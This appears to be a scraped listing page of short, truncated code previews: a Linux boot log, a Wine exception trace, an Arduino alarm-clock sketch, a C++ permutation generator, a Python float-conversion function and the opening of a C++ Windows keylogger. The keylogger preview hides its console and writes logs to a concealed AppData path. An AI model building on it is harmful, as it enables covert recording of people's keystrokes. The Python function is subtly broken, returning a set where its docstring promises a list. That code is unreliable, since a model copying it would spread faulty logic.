This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
[ 0.348811] system 00:01: Plug and Play ACPI device, IDs PNP0c02 (active) | |
[ 0.348826] pnp 00:02: Plug and Play ACPI device, IDs PNP0b00 (active) | |
[ 0.348857] system 00:03: [io 0x1854-0x1857] has been reserved | |
[ 0.348859] system 00:03: Plug and Play ACPI device, IDs INT3f0d PNP0c02 (active) | |
[ 0.348994] system 00:04: [io 0x0a00-0x0a0f] has been reserved | |
[ 0.348995] system 00:04: [io 0x0a30-0x0a3f] has been reserved | |
[ 0.348996] system 00:04: [io 0x0a20-0x0a2f] has been reserved | |
[ 0.348998] system 00:04: Plug and Play ACPI device, IDs PNP0c02 (active) | |
[ 0.349215] pnp 00:05: [dma 0 disabled] | |
[ 0.349243] pnp 00:05: Plug and Play ACPI device, IDs PNP0501 (active) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
2031.466:0029:002a:warn:debugstr:OutputDebugStringA "Done MVC Manager Create Views\n" | |
2031.466:0029:002a:trace:seh:raise_exception code=40010006 flags=0 addr=0x7b43d64d ip=7b43d64d tid=002a | |
2031.466:0029:002a:trace:seh:raise_exception info[0]=0000001f | |
2031.466:0029:002a:trace:seh:raise_exception info[1]=0b9ea560 | |
2031.466:0029:002a:trace:seh:raise_exception eax=7b42a439 ebx=7b640ff4 ecx=00000000 edx=0032e504 esi=0032e5a8 edi=0032e508 | |
2031.466:0029:002a:trace:seh:raise_exception ebp=0032e558 esp=0032e4e4 cs=f7bd0023 ds=32002b es=002b fs=0063 gs=006b flags=00000216 | |
2031.466:0029:002a:trace:seh:call_stack_handlers calling handler at 0x7b486d80 code=40010006 flags=0 | |
2031.466:0029:002a:trace:seh:__regs_RtlUnwind code=40010006 flags=2 | |
2031.466:0029:002a:trace:seh:__regs_RtlUnwind eax=00000000 ebx=7b486ce0 ecx=0032e4f0 edx=0032e5ac esi=0032e5ac edi=7b486ce0 | |
2031.466:0029:002a:trace:seh:__regs_RtlUnwind ebp=0032e0c8 esp=0032e0a8 eip=7b486d3d cs=0023 ds=002b fs=0063 gs=006b flags=00000202 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Wire.h> | |
#include <TimeLib.h> | |
#include <DS1307RTC.h> | |
#include <LiquidCrystal_I2C.h> | |
int budzikGodzina = 7, budzikMinuta = 0; | |
LiquidCrystal_I2C lcd(0x27, 16, 2); | |
tmElements_t tm; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <iostream> | |
using namespace std; | |
const string charset = "abcdefghijklmnopqrstuvwxyz"; | |
void permutate(const string& charset, string& built, int rounds, size_t stringPos = 0) { | |
if(built.size() == stringPos) { | |
built += "!"; | |
} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'''Converts a float to a list of an integer and the amount of decimal places''' | |
def float_to_custom_notation(fl): | |
power = 0 | |
while(not fl.is_integer()): | |
fl = float(fl) | |
fl *= 10 | |
power += 1 | |
fl = float(fl) | |
return{int(fl), power} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#include <Windows.h> | |
#include <fstream> | |
using namespace std; | |
int main() | |
{ | |
FreeConsole(); | |
fstream logs; | |
logs.open("C:\\Users\\uczen\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Medium\\KILOGGER\\logs.txt", ios::app | ios::ate | ios::out); |